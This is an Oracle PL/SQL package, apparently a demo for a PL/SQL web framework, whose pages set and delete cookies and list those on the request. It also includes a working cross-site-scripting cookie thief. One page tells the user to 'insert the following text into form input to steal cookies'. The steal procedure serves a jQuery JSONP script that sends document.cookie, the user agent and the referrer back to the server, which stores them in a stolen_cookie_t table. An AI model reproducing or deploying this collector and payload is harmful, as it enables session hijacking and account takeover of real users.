create or replace package body cookie_h is procedure form_view is n varchar2(100); v varchar2(999); begin src_b.header; x.l('', '[bootstrap.css]'); x.o(''); if not r.is_null('name') then h.set_cookie(r.getc('name'), r.getc('value'), domain => r.getc('domain'), path => r.getc('path'), httponly => r.getb('httponly'), secure => r.getb('secure')); --r.setc('c$' || r.getc('name'), r.getc('value')); elsif not r.is_lack('delname') then for i in 1 .. r.cnt('delname') loop tmp.s := r.getc('delname', idx => i); h.set_cookie(tmp.s, r.getc('c$' || tmp.s), httponly => false, expires => trunc(sysdate - 1)); end loop; end if; if r.method = 'POST' then h.refresh(1, r.prog); return; h.go(r.prog); end if; x.f('
', r.prog); x.o('
'); x.p('', 'set cookie'); x.o(' '); x.p('
'); x.c('
'); x.o(''); x.t(''); x.c(''); x.o(''); if r.is_lack('cookie') then x.p('

', 'insert the following text into form input to steal cookies'); x.p('

', x.e(x.r('', r.dir_full))); else x.p('

', 'stolen cookie'); x.t(r.getc('cookie')); end if; x.c(''); x.t('

'); x.p('

', '## This is all http request cookies'); x.f('
', r.prog); n := ra.params.first; x.o('
    '); loop exit when n is null; if n like 'c$%' then v := ra.params(n) (1); x.p('
  1. ', x.v('', substrb(n, 3)) || ' ' || n || ' : ' || v); end if; n := ra.params.next(n); end loop; x.c('
'); x.s(' '); x.c(''); end; procedure steal is v stolen_cookie_t%rowtype; begin if r.is_lack('cookie') then -- gen script content x.t(x.r(' $.ajax("@",{ dataType: "jsonp", data: { cookie:document.cookie, ua:navigator.userAgent, referer:document.referrer } }); ', r.url_full)); else -- got stealed info v.logtime := sysdate; v.referer := r.getc('referer'); v.cookies := r.getc('cookie'); v.ua := r.getc('ua'); insert into stolen_cookie_t values v; end if; end; end cookie_h; /